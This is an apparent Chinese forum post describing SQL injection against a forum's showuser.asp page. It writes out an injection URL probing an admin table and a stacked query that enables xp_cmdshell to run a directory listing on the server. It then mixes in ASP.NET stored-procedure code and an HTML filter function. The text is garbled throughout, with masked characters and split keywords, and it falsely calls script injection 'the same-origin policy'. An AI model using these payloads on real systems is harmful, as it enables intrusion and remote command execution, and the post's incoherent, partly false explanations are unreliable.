(se+lectcount去掉+号)做这个之前，调用批处理文件已经崩溃好几次！返回结果总是出错。现在进入正题！ 首先用一个SQL特殊字符对梦网数据库进行跨表查询，如下http://168.0.0.1/forum/showuser.as*=901 and 0＜(se+lectcount(*) from admin)，用必要的信息形成字符串/forum/showuser.asp?id=901’; *** @a sysna* set @a=’***’+ ’cmdshell’ *** @a ’dir c:\’---&*d=9，得到ASP后台代码如下：SqlConnection conn = new SqlConnec*tion(ConnectionString); conn.Open(); //设定SqlCom mand的属性 SqlCom mand cmd = new SqlCom mand(“移动梦网“, conn); cmd.Com mandType = Com mandType.StoredProcedure; cmd.Para*ters.Add(“@SourceStr“, SqlDbType.VarC har, 1000).Value = this.TextBox1.Text.Trim(); //901 cmd.Para*ters.Add(“@ReplaceStr“, SqlDbType.Va*rC har, 1000).Value = this.TextBox2.Text.Trim(); //替换后的字符（901） 这样只要能在出错的地方注入Scr ipt数据类型，所有安全控制几乎全部瓦解，这就是所谓的同源策略。消弱梦网安全模型后过滤函数：fqyString = replace(fqyString, “&#“, “&“) 　　fqyString = Replace(fqyString, CHR(32), “ “) 　　fqyString = Replace(fqyString, CHR(9), “ “) 　　fqyString = Replace(fqyString*, CHR(34), “““) 　　fqyString = Replace(fqyString, CHR(39), “’“) 　　fqyString = Replace(fqyString, CHR(13), ““) 　　fqyString = Replace(fqyString, CHR(10)&CHR(10), “＜/P＞＜P＞ “) 　　fqyString = Replace(fqyString, CHR(10), “＜BR＞ “) CHK = fqyString end function 存储该过程PROCEDURE [dbo].[newUsersProc_Replace] @*SourceStr Var***(1000), @ReplaceStr Var***(1000) AS BEGIN 手动替换得到返回结果，这样一个简单的自用暂停系统就做好了[丿ｖIp丨贵族>宅男℡灬最后编辑于2011-1-22 6:38:15]